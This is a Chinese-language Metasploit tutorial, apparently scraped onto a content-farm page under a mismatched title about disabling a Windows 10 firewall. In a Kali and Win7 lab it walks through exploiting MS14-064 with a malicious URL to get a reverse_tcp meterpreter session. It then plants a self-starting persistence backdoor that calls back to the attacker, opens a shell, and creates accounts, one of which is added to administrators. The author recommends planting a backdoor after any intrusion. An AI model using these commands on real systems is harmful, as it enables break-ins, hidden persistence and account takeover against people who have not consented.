win10虚拟机如何关闭防火墙-(虚拟机中如何关闭防火墙)
在VMware上建立兩個虛擬機:win7和kali。
Kali:它是Linux發行版的操作系統,它擁有超過300個滲透測試工具,就不用自己再去找安裝包,去安裝到我們自己的電腦上了,畢竟自己從網上找到,也不安全。它甚至還集成了600多種黑客工具,很強大。
可以永久免費使用,基本上學黑客攻擊必會用到這個系統。
靶機:Win7 64位 (IP: 192.168.10.45)--用ipconfig進行查詢。

攻擊機:Kali (IP:192.168.10.21)--用ifconfig進行查詢。

【一一幫助安全學習,所有資源關注我,私信回復“資料”獲取一一】
①網絡安全學習路線
②20份滲透測試電子書
③安全攻防357頁筆記
④50份安全攻防面試指南
⑤安全紅隊滲透工具包
⑥網絡安全必備書籍
⑦100個漏洞實戰案例
⑧安全大廠內部視頻資源
⑨歷年CTF奪旗賽題解析
win7中,關閉防火墻(“打開網絡和共享中心”-“Windows防火墻”-“打開或關閉Windows防火墻”-均選擇關閉選項)。
保證兩個虛擬機是可以ping通的(尤其是在kali中去ping win7,看能否連通)。
$ping 192.168.10.45
2、打開Metasploit滲透工具Metasploit是一款開源的安全漏洞檢測工具,msfconsole用于啟動msf終端:
>msfconsole
**結果:**成功進入,進入到"msf6>“的模式下
3、查看需要利用的漏洞搜索漏洞,編號為MS14-064。
MS14-064為Windows OLE自動化陣列遠程代碼執行漏洞。當IE不作訪問內存中的對象時,存在遠程代碼執行漏洞。OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術,遠程攻擊者利用此漏洞通過構造的網站執行任意代碼,用戶使用IE瀏覽器查看該網站時允許遠程執行代碼。
【補充:Windows系統漏洞微軟的漏洞編號命名格式為:MS14-064;
MS Micosoft的縮寫,固定格式;
14 表示年份,即2014年發布的漏洞;
064 表示順序,即當年度發布的第64個漏洞。
>search ms14-064
**結果:**可以看到返回了多條可利用的漏洞模塊信息
4、嘗試利用其中一個漏洞模塊進行攻擊利用其中一個漏洞攻擊模塊-0模塊,進行攻擊,進入模塊中(注意:必須是“_”,不是“-”,否則會報錯)。
>use exploit/windows/browser/ms14_064_ole_code_execution
**結果:**成功切換到這個模塊之下--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“
并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--沒有配置payload,默認為 windows/meterpreter/reverse_tcp
5、查看該漏洞模塊所需的參數情況進到這個漏洞模塊之后,先查看該測試模塊的參數情況。類似于你使用一軟件,進行攻擊,是不是需要先進行一些簡單的參數配置啊,需要告訴軟件,要向誰發起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數。
>show options
**結果:**其中required顯示的值為yes的,代表是必須要設置的項;顯示的值為no的,代表是不必須要設置的項;
重點關注6個參數配置,需要設置哪個就設置哪個:
Payload (攻擊載體-使用默認的windows/meterpreter/reverse_tcp即可) ;
SRVHOST (文件共享服務器-kali地址);
SRVPORT (文件共享服務器的端口-使用默認獲取的端口即可);
LHOST (發起攻擊的地址-kali地址);
LPORT (發起攻擊的端口-使用默認獲取的端口即可);
AllowPowershellPrompt (開啟瀏覽器插件,默認為false)


【補充說明:
1)Payload中包含有需要在遠程系統中運行的惡意代碼,Payload是一種特殊模塊,它們能夠以漏洞利用模塊運行,并能夠利用目標系統中的安全漏洞實施攻擊。也就是說,漏洞利用模塊可以訪問目標系統,而其中的代碼定義了Payload在目標系統中的行為。
2)Payload模塊主要有以下三種類型:-Single -Stager -Stage
Single是一種完全獨立的Payload,實現的目的也簡單,但容易被捕捉到。
Stager這種Payload負責建立目標用戶與攻擊者之間的網絡連接,并下載額外的組件或應用程序。 一種常見的Stagers Payload就是reverse_tcp,它可以讓目標系統與攻擊者建立一條tcp連接(3次握手-4次揮手)(是一個基于TCP的反向鏈接反彈shell, 使用起來很穩定)。
Stage是Stager Payload下載的一種Payload組件,這種Payload可以提供更加高級的功能,而且沒有大小限制。
3)windows/x64/meterpreter/reverse_tcp則由一個Stager Payload(reverse_tcp)和一個Stage Payload(meterpreter)組成。
注意:Payload為windows/meterpreter/reverse_tcp 默認獲取到的控制通道meterpreter為32位,
如果想將之后獲取到的控制通道meterpreter改為64位,則設置。payload:windows/x64/meterpreter/reverse_tcp
6、設置文件共享服務器發現SRVHOST為空,待設置,其它(payload/SRVPORT/LHOST/LPORT)均已獲取,且正確,設置SRVHOST的對應的參數地址,它指的是文件共享服務器的地址,想一想,要設成誰?為什么?
分析一下:是在哪里用到這個文件共享服務器?是不是會在生成一個網址,誘導用戶點擊了,就會直接連接到發起攻擊的主機上。那你們覺得應該是誰生成這個連接呢?是用戶那邊么?還是攻擊者這邊?肯定是攻擊者這邊吧,我們是不知道會有誰點了這個網站鏈接吧。
所以,我們才會對這個文件共享服務器的地址設置為kali的地址
>set SRVHOST 192.168.10.21
要把AllowPowershellPrompt的默認參數false改為true,因為msf中自帶的漏洞是利用exp調用的是powershell(powershell是一種命令外殼程序和腳本環境),所以msf的exp代碼只對安裝了powershell的系統生效。
>set AllowPowershellPrompt true
查看對SRVHOST和AllowPowershellPrompt進行的修改,是否修改成功
>show options
>run
**結果:**生成一個網站的鏈接“Using URL : http://192.168.10.21:8080/xE6RxjSy,開啟服務,光標停留在這,等待有人點擊該網站鏈接。
10、打開網站鏈接到win7中,在IE瀏覽器中打開網站鏈接: http://192.168.10.21:8080/xE6RxjSy,會提示是否允許打開一個文件,選擇“允許”之后,即可觸發會話連接。

**結果1:**在win7中打開鏈接后,不會有任何的反饋結果。

**結果2:**由于在win7中觸發打開了網址鏈接,那么,在kali中,則會觸發會話連接,結果顯示了是192.168.10.45(目標主機win7)嘗試點擊了該網站鏈接,于是,kali利用MS14-064漏洞模塊對目標主機發起了攻擊,最終,“meterpreter session 1 opened”--表明已經開通192.168.10.21:4444和192.168.10.45:49191會話連接1。
一般會自動進入控制通道meterpreter,交互模式,表明攻擊成功。


注意:
一旦開通一個會話連接后,若系統沒有自動進入控制通道,則可以嘗試回車,進行手動連接。
1)手動查看當前存在的會話
注意在目錄msf>下,手動查看當前存在的會話。
**結果:**當前只有會話連接1,meterpreter建立的連接類型type是x86–32位的(由模塊中的payload設定),以及展示目標主機192.168.10.45的基本信息和連接信息。
>sessions
2)選擇連接當前已經開通的會話1
>sessions -i 1
**結果:**成功進入控制通道meterpreter,交互模式,表明攻擊成功。
11、植入后門程序在kali控制win7后,通過persistence,在目標主機上生成一個后門程序,以便后續不再通過MS14-064漏洞進行二次入侵,而是通過這個后門文件來入侵該主機【注意在控制通道meterpreter>下】。
注意:因為這個MS14-064漏洞很容易被修復,一旦目標主機進行定期修補漏洞,那么通過MS14-064漏洞進行入侵的路徑,就會失效,但植入的后門程序是不容易被發現和修復的,所以一旦入侵成功后,建議嘗試植入后門程序。
通過persistence(支持多種方式啟動)植入固定的后門程序,設置相關參數,設置回連地址和端口號。
>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21
重點關注6個參數配置:
-S:系統啟動時自動加載本程序(因為該后門程序是不能被目標用戶發現,更不需要讓目標主機進行點
擊啟動的,所以需要該程序有自動加載的功能);
-U:用戶登陸時自動加載本程序;
-X:開機時自動加載本程序;
-i: 自動加載后,回連的時間間隔,即后門每隔多少秒嘗試連接回連地址;
-r: 自動加載后,回連的主機地址,回連到誰啊,自然是入侵的kali的地址;
-p:自動加載后,回連的端口號,即kali地址的端口號,理論上可隨意設置,但范圍不要超過65535,且
不可設置為常見的特殊的端口號;
**結果1:**在kali中提示,成功生成一個后門程序yqLAOjt.vbs,自動加載后會回連到192.168.10.21:40000,并保存于目標主機win7中的C:\Users\18044\AppData\Local\Temp\目錄下。
【**注意:**payload自動設置為“windows/meterpreter/reverse_tcp”,LHOST設置為192.168.10.21,LPORT設置為40000】

**結果2:**在win7中的C:\Users\18044\AppData\Local\Temp\目錄下,成功找到從攻擊主機kali植入的后門程序yqLAOjt.vbs

【補充知識點:
1)端口號范圍:0~65535

2)常見端口號列舉
12、掛起當前會話在成功植入后門程序后,我們還需要對該后門程序進行驗證,驗證是否可以通過該后門程序成功入侵目標主機win7,所以可先將當前通過MS14-064漏洞開啟的會話連接掛起(background)或斷開(exit),均可
meterpreter>background
**結果:**成功將session會話1掛起到后臺,并沒有斷開連接,且成功切換到msf >目錄下
13、開啟監聽模塊利用后門程序進行攻擊,需要打開一個監聽模塊,能夠反彈shell監聽模塊,進行攻擊,進入模塊中
>use exploit/multi/handler
**結果:**成功切換到這個模塊之下--”msf6 exploit(multi/handler)>“
并提示“Using configured payload generic/shell_reverse_tcp”--使用的payload為generic/shell_reverse_tcp
14、查看該監聽模塊所需的參數情況進到這個監聽模塊之后,先查看該模塊的參數情況。類似于你使用一軟件,進行攻擊,是不是需要先進行一些簡單的參數配置啊,需要告訴軟件,要向誰發起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數?
>show options
**結果:**其中required顯示的值為yes的,代表是必須要設置的項;顯示的值為no的,代表是不必須要設置的項;
重點關注3個參數配置,需要設置哪個就設置哪個:
Payload:攻擊載體;
LHOST:回連地址;
LPORT:回連端口號;
15、設置攻擊載體、回連地址以及端口號因為我們要開啟的這個監聽模塊,是專門針對于yqLAOjt.vbs后門程序,進行實時監聽,那么,必然需要將監聽模塊的參數配置,與yqLAOjt.vbs后門程序的參數配置保持一致,只有這樣,才能達到準確的監聽
之前制作yqLAOjt.vbs的參數為:
"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"
因此,我們也就需要將監聽模塊的攻擊載體Payload,與后門程序的payload保持一致:
>set payload windows/meterpreter/reverse_tcp
需要將監聽模塊的回連地址LHOST,與后門程序的LHOST保持一致:
>set LHOST 192.168.10.21
需要將監聽模塊的回連地址的端口號LPORT,與后門程序的LPORT保持一致:
>set LPORT 40000
>show options
>run
**結果:**開啟針對192.168.10.21:40000的監聽模式,因為yqLAOjt.vbs后門程序已經設置了自動加載,所以一旦開啟監聽模塊,立即會有反饋信息回連到192.168.10.21:40000上來。
最終,“meterpreter session 2 opened”--表明已經開通192.168.10.21:40000和192.168.10.45:49227的會話連接2。
一般會自動進入控制通道meterpreter,交互模式,表明攻擊成功。

【注意:
此時,將當前開啟的會話進行掛起操作–background,再查看當前已存在的會話–sessions,結果會得到已開啟兩個會話連接信息,要對這兩個會話連接進行區分,分清楚,第一個會話連接是通過MS14-064漏洞開啟的,第二個會話連接是通過后門程序開啟的
18、創建用戶、設置密碼1)拿到shell權限,獲得控制臺權限,可以獲取系統的控制臺C:\Windows\system32
meterpreter>shell
2)進入后,可能會有亂碼的情況,解決亂碼問題
C:\Windows\system32>chcp 65001


3)顯示win7系統中所有的用戶
C:\Windows\system32>net user
4)創建用戶
創建用戶,用戶名為test,密碼為test【net user 用戶名 密碼 /add】
C:\Windows\system32>net user test test /add
也可以不設置密碼,只創建用戶名為test1的無密碼用戶【net user 用戶名 /add】
C:\Windows\system32>net user test1 /add
**結果1:**在kali中,若結果顯示“the commad completed successfully”—代表“命令執行成功” ,用戶創建成功 ;
若結果顯示“system error 5 has occurred;access is denied”—“發生系統錯誤5; 拒絕訪問”-----代表權限不夠的問題,需要**進行提權,可以利用bypassuac或者Windows內核漏洞進行提權



**結果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看成功新建的用戶test(標準用戶–密碼保護)、test1(標準用戶–無密碼)

5)將新用戶添加到administrator分組–提升到管理員權限【net localgroup administrators 用戶名 /add】
C:\Windows\system32>net localgroup adminis trators test1 /add
**結果1:**在kali中,顯示“the commad completed successfully”—代表“命令執行成功” ,成功添加到administrator分組,提升管理員權限成功 ;

**結果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看新建的用戶test1用戶由之前的”標準用戶“提升至”管理員“,提升權限成功。


這是水淼·dedeCMS站群文章更新器的試用版本更新的文章,故有此標記(2023-10-27 08:34:26)
總結
以上是生活随笔為你收集整理的win10虚拟机如何关闭防火墙-(虚拟机中如何关闭防火墙)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 联想主机怎么进入主板设置u盘启动-(联想
- 下一篇: 韩博士win7-(韩博士win7激活密钥